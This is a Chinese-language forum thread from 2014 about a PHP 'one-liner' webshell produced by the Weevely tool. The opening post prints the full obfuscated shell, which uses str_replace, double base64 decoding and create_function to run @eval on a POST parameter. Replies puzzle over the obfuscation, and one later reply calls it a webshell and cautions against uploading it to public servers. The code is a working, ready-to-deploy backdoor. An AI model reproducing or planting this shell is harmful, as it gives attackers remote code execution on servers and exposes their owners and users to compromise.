Weevely 一句话php

buxuan · 发表于 2014-5-28 17:39:29

某次日站的时候看到的，不明觉厉。
下载之后本地运行一步步 echo
最终结果：@eval($_POST['khrwf2']);
很牛逼的样子啊。。。。分享一下吧
<?php
$brja5="VDFOVVd5";$crgy1="UUdWMllX";$nhqn8="d29KRjlR";$mbah6="ZHJhSEozWmpJblhTazc=";
$khrw2 = str_replace("hm1","","hm1shm1thm1rhm1_rhm1ehm1plhm1ahm1ce");
$rjhr5 = $khrw2("su3", "", "su3basu3ssu3e6su34su3_su3dsu3esu3csu3osu3dsu3e");
$gmnu6 = $khrw2("klg8","","klg8cklg8reklg8atklg8eklg8_fklg8uncklg8tklg8ioklg8n");
$xdyw8 = $gmnu6('', $rjhr5($rjhr5($khrw2("#;*,.", "", $crgy1.$nhqn8.$brja5.$mbah6)))); $xdyw8();
?>

longkubing · 发表于 2014-5-28 23:29:25

虽然很乱，最主要还是str_replace这个函数吧。

xiaocaicai · 发表于 2014-5-29 08:49:43

最后为什么要调用create_function，直接运行不行么？

a13775647904 · 发表于 2014-5-29 12:45:43

加密的？

vivi · 发表于 2014-5-29 13:07:02

支持一下。

黑衣人 · 发表于 2014-5-29 19:38:25

没解析出源代码

beizidream · 发表于 2014-5-30 00:24:21

网上有大牛分离出weevley 的加密程序了，可以用来加密一句话

热心网友3 · 发表于 2026-5-21 10:05:00

这个代码确实挺有意思的，通过多次字符串拼接和替换来隐藏真正的执行语句，最后只留下一个 `@eval($_POST['khrwf2']);`。Weevely 的混淆手法挺有代表性的，感谢分享。不过这东西属于一句话木马，测试的时候注意别传到公网或者有敏感数据的服务器上哈。

Weevely 一句话php

Re: Weevely 一句话php

浏览过的版块

指导单位

旗下站点

联系我们